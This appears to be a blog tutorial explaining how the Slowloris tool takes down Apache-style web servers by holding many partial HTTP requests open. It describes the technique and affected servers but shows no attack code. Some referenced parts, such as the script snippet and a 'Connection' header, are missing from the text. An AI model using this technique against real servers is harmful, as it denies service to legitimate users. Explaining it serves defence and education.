A DDOS(Distributed Denial of Service) attack is one of the major problem, that organizations are dealing with today.
Such a kind of attack is very difficult to mitigate, especially for small organizations with small infrastructure. The main difficulty in dealing with DDOS attack is the fact that, traditional firewall filtering rules does not play well. The main reason behind this problem is that, most of the time the attacking machines(machine's that take part in a DDOS attack, and becomes part of a bot-net) are large in number and are from diverse geographical locations.
And one major point is that the request type mostly used to take down a service appears legitimate, but the large magnitude of requests will make the service offline for legitimate requests.
A recent attack tool revealed in 2009 by RSnake gained a lot of popularity in security forum's and groups. The main reason is the fact that, this tool requires no bandwidth to launch an attack.
The basic idea behind the tool revealed by RSnake is that it only affects the targeted http service, without affecting other services that's running on the server.
The name "SLOWLORIS" does fit perfect for the tool, due to the simple fact, that it can single handedly takedown a web server by slowly by consuming all connections on the server.
To understand how this tool, works i will recommend to read my post on "HTTP request and response" before going ahead with this, because a basic understanding of HTTP working is very much necessary for this.
Traditional DDOS attack tools and methods target to consume the system resources by opening too much TCP connections to the server. However SLOWLORIS is not a TCP DOS attack tool, but a http DOS attack tool.
Slowlos works by making partial http connections to the host(but the TCP connections made by slowloris during the attack is a full connection which is a legitimate tcp connection.)
Slowloris tries to keep an http session active continuously for a long period of time. Its a very well known fact that, web server's like Apache works on a threaded or a process based model. Due to which the server will become unavailable for new requests, if all the threads, or processes of a web server are consumed.
Which web-server's are affected by slowloris attack?
Apache (1.x & 2.x)
Goahead web server
Web server's that work on an event based architecture like nginx are not affected by a slowloris attack.
It seems that IIS is also is not affected by a slowloris attack(although not tested by us).
How does slowloris http dos attack work?
An in depth understanding of http request and response is very much necessary to comprehend this attack tool.
Because it exploits a vulnerability in the web server(which was purposely made by the authors for different advantages like serving requests for a slow connection ) which wait for a complete header to be received.
Apache & some other web server's have a mechanism of timeout. An Apache web server will wait for this specified timeout duration for the completion of a request( if the request was incomplete ).
This timeout value is by default 300 seconds, but is modifiable. This timeout value is very much useful if a website serve's large files for download through http(because it maintains an active http connection of a slow client without breaking the download).
But imagine a situation if somebody purposely send partial http requests and reset the timeout counter of each request by sending some bogus data very frequently.
That's exactly what slowloris does. It sends partial http request with bogus header's. Once all connections are consumed by sending partial requests, it keeps on maintaining the connection's by sending request data and reseting the timout counter.
A complete GET request looks like something below.
GET / HTTP/1.0[CRLF]
User-Agent: Wget/1.10.2 (Red Hat modified)[CRLF]
What are those CRLF in that get request?
CRLF stands for CR (Carriage Return) and LF (Line Feed). This character is an entity which is non printable, used to denote end of the line.
Even when you are typing on a text editor the editor puts a CRLF at the end of a line when you want a new line after that.
And two CRLF characters together is used to denote a blank line.
In the above shown GET request there are two CRLF characters at the end of the "Connection"header(which means a blank line). In http protocol, a blank line after the header's is used to represent the completion of the header.
Slowloris tool takes advantage of this in implementing its attack. It does not send a finishing blank line, which indicates the end of the http header.
Some web server's give higher priority to those requests which are complete in its header's. This is the reason why IIS is not affected by a slowloris attack.
An incomplete request send by the slowloris script is shown below. This below snippet is taken from the slowloris script
In the above snippet shown \r\n is used to denote carriage return and newline in perl. Two consecutive "\r\n\r\n", should be there to denote a blank line, which is not there. So thats an incomplete header in HTTP.
Slowloris perl script http dos attack and its usage